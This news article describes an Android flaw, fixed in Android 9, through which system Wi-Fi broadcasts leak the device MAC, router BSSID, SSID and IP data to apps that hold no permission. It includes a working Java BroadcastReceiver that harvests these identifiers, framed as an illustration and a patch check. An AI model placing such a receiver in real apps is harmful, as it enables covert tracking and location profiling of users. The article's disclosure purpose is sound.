Android leaks sensitive networking information to already installed apps, and that information can be used to track a device. According to security company NightWatch Cybersecurity, which discovered the vulnerability, the issue affects all Android devices except those running the latest version of the operating system.
Google's operating system uses so-called Intents to allow communication between processes. An app or the OS itself can use Intents to send system-wide messages (broadcasts) that can be received by other apps. This is useful, but it also allows a malicious app to intercept messages meant for other apps. The Intents that carry information about the Wi-Fi connection and the Wi-Fi network interface are especially interesting for malicious apps, and Android regularly sends them to all apps on a device.
These Intents contain, for example, the MAC address of the device, the MAC address of the Wi-Fi router (the BSSID), the Wi-Fi network name (the SSID), the local IP range, the IP address of the gateway and the address of the DNS server.
Apps can also retrieve this information from the Android WifiManager, but that requires the app to request a specific permission (ACCESS_WIFI_STATE) at installation. Since Android 6.0 it is also no longer possible to retrieve the device's own MAC address through that API; it returns a placeholder value instead. An app that simply listens for the system-wide Intents, however, receives the same data without holding any permission at all.
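The following receiver is an added illustration, written for this article and not NightWatch's own proof of concept. It shows the mechanism described above: an app whose manifest declares no permissions registers a BroadcastReceiver for the two Wi-Fi broadcasts (WifiManager.NETWORK_STATE_CHANGED_ACTION and WifiP2pManager.WIFI_P2P_THIS_DEVICE_CHANGED_ACTION) and reads the identifiers attached to them. The extras it reads (EXTRA_WIFI_INFO and EXTRA_WIFI_P2P_DEVICE) are standard Android constants; which fields are populated depends on the Android version and the connection state, so the null checks are part of the example.

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.net.wifi.p2p.WifiP2pDevice;
import android.net.wifi.p2p.WifiP2pManager;
import android.text.format.Formatter;
import android.util.Log;

/**
 * Illustrative receiver (added example, not NightWatch's code). The app that
 * hosts it requests NO permissions: system Wi-Fi broadcasts are delivered to
 * any registered receiver, which is the whole point of the leak.
 */
public class WifiBroadcastSniffer extends BroadcastReceiver {
    private static final String TAG = "WifiSniffer";

    /** The two system broadcasts that carry the Wi-Fi identifiers. */
    public static IntentFilter filter() {
        IntentFilter f = new IntentFilter();
        f.addAction(WifiManager.NETWORK_STATE_CHANGED_ACTION);
        f.addAction(WifiP2pManager.WIFI_P2P_THIS_DEVICE_CHANGED_ACTION);
        return f;
    }

    /**
     * Dynamic registration from e.g. an Activity's onCreate(). No manifest
     * entry and no permission is required to receive these broadcasts.
     */
    public static WifiBroadcastSniffer register(Context ctx) {
        WifiBroadcastSniffer r = new WifiBroadcastSniffer();
        ctx.registerReceiver(r, filter());
        return r;
    }

    @Override
    public void onReceive(Context ctx, Intent intent) {
        String action = intent.getAction();
        if (WifiManager.NETWORK_STATE_CHANGED_ACTION.equals(action)) {
            // WifiInfo is attached as an extra while a Wi-Fi connection is active.
            WifiInfo info = intent.getParcelableExtra(WifiManager.EXTRA_WIFI_INFO);
            if (info == null) {
                return; // disconnected, or the extra was not included
            }
            // Through the WifiManager API this has been a placeholder since 6.0;
            // in the broadcast it was the real interface MAC before the fix.
            Log.i(TAG, "device MAC   : " + info.getMacAddress());
            Log.i(TAG, "router BSSID : " + info.getBSSID());
            Log.i(TAG, "network SSID : " + info.getSSID());
            Log.i(TAG, "IPv4 address : " + Formatter.formatIpAddress(info.getIpAddress()));
        } else if (WifiP2pManager.WIFI_P2P_THIS_DEVICE_CHANGED_ACTION.equals(action)) {
            // Wi-Fi Direct announces this device, including its own MAC address.
            WifiP2pDevice dev = intent.getParcelableExtra(WifiP2pManager.EXTRA_WIFI_P2P_DEVICE);
            if (dev == null) {
                return;
            }
            Log.i(TAG, "P2P device MAC: " + dev.deviceAddress);
        }
    }
}
```

Calling WifiBroadcastSniffer.register(this) from any component and toggling Wi-Fi is enough to see the values in logcat. The same receiver doubles as the practical check for a given device: on a build that carries the fix, the broadcasts still arrive, but the identifying fields are no longer populated with real values.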
Because the MAC address is specific to the device, it can be used to track an Android device even when MAC address randomization is enabled. The network name and the MAC address of the router can in turn be used to determine the user's location, according to NightWatch Cybersecurity.
Google was informed about the issue on the 28th of March and fixed it this month with the launch of Android 9; that is the only Android version in which the issue is resolved. Older Android versions will not receive an update, because the fix requires a large API change that could have negative side effects. Users are therefore advised to upgrade to Android 9.0 as soon as possible.